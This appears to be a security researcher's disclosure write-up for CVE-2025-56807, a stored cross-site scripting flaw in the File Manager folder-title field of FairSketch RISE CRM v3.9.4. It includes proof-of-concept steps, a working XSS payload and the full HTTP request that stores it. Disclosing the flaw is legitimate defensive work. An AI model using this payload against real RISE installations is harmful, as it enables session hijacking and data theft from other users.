# CVE-2025-56807
# Description
A Stored Cross Site Scripting (XSS) vulnerability was discovered in FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) in the File Manager functionality. The vulnerability lies in the _**title parameter**_ that is submitted when creating new folders. Due to insufficient input sanitization an attacker can inject _**HTML/JavaScript payloads (e.g., `<details/open/ontoggle=prompt(origin)>`)**_. The payload is stored in the folder name and executed when listing folders in the File Manager, allowing arbitrary JavaScript execution in the browser of any user who views the affected folder. This may result in session hijacking and data exfiltration.

> [!NOTE]  
> This vulnerabilitity is not exclusive to administrator accounts. It can be exploited using any user account which has the permission to create new folders in the File Manager.

# Disclosure Timeline
* Assigned CVE ID: **[CVE-2025-56807](https://nvd.nist.gov/vuln/detail/CVE-2025-56807)**
* Discovery: July 2025 (by Aqwa Hameed)
* Vendor Notified: Emailed Fairsketch support
* Response: Acknowledged by vendor on July 22, 2025

# Proof of Concept (PoC)
1. Login with valid credentials.
2. Navigate to **Files**
<br/><br/>
![Dashboard](https://github.com/aqwainfosec/CVE-2025-56807/blob/main/assets/dashboard.png?raw=true)

3. Click **New Folder**
<br/><br/>
![File Manager](https://github.com/aqwainfosec/CVE-2025-56807/blob/main/assets/file_manager.png?raw=true)

4. Enter the payload below in the **Title** field, enter:
```js
<details/open/ontoggle=prompt(origin)>
```
![Folder Title](https://github.com/aqwainfosec/CVE-2025-56807/blob/main/assets/malicious_folder.png?raw=true)

5. Reload the File Manager page to trigger the payload
<br/><br/>
![Payload Execution](https://github.com/aqwainfosec/CVE-2025-56807/blob/main/assets/payload_execution.png?raw=true)

# Request
```http
POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
```
